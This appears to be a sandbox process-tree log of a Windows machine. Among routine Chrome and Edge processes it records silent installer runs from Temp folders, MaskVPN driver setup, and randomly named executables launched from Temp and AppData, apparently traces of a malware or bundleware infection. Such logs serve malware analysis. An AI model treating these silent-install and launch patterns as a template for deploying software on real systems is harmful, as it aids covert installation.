C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:22⤵PID:7896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:82⤵PID:4252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:82⤵PID:8992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:82⤵PID:8824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:82⤵PID:9980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵PID:1796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:82⤵PID:6356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1824 /prefetch:82⤵PID:10052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:82⤵PID:6364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3368 /prefetch:82⤵PID:10140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1712 /prefetch:82⤵PID:10020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:82⤵PID:6000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=6108 /prefetch:22⤵PID:10156
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:8952
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff745197740,0x7ff745197750,0x7ff7451977603⤵PID:5844
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:82⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6108 /prefetch:82⤵PID:9144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:82⤵PID:7912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:82⤵PID:11256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:82⤵PID:4092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:82⤵PID:5144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:10828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:82⤵PID:11052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1932 /prefetch:82⤵PID:5552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3644 /prefetch:82⤵PID:3352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=160 /prefetch:82⤵PID:8352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:82⤵PID:2792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:82⤵PID:10484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:82⤵PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3352 /prefetch:82⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:82⤵PID:6428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:82⤵PID:7184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:12⤵PID:10436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:82⤵PID:3896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:82⤵PID:3852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:82⤵PID:9032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:82⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:82⤵PID:3216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3212 /prefetch:82⤵PID:8788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5588 /prefetch:82⤵PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3236 /prefetch:82⤵PID:3292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:12⤵PID:8768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:82⤵PID:5672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e201⤵PID:4952
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:4900
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{09221028-786a-664f-be61-517be9b13a38}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5804
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:9672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e201⤵PID:8844
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:8100
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1772306435357277002,17170144750154849378,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1596 /prefetch:82⤵PID:9336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:7828
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,18009680223387911031,10197397551359461899,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1600 /prefetch:82⤵PID:4552
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\41e79155ff074c4dbb0f96b7748e6fef /t 7504 /p 75121⤵PID:6508
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:10036
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:10080
-
C:\Users\Admin\AppData\Local\Temp\is-28M4M.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-28M4M.tmp\Setup3310.tmp" /SL5="$307FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe" /Verysilent /subid=5771⤵PID:10060
-
C:\Users\Admin\AppData\Local\Temp\is-4U1UQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4U1UQ.tmp\Setup.exe" /Verysilent2⤵PID:9660
-
-
C:\Users\Admin\AppData\Local\Temp\is-4RP83.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-4RP83.tmp\vpn.tmp" /SL5="$2087C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe" /silent /subid=4821⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\F308.exeC:\Users\Admin\AppData\Local\Temp\F308.exe1⤵PID:10200
-
C:\Users\Admin\AppData\Local\Temp\FF7D.exeC:\Users\Admin\AppData\Local\Temp\FF7D.exe1⤵PID:9844
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8792
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:10020
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\95f1793ce5594b5f8a2e19dd810ee746 /t 2572 /p 25881⤵PID:9252
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\9da7678887fb43afbcd61411ceaf5d54 /t 6972 /p 87921⤵PID:10468
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:10660
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:3708
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:8792
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:10372
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:3792
-
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:4200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5196
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:10252
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5096
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5672
-
C:\Users\Admin\AppData\Roaming\hsubghrC:\Users\Admin\AppData\Roaming\hsubghr1⤵PID:8252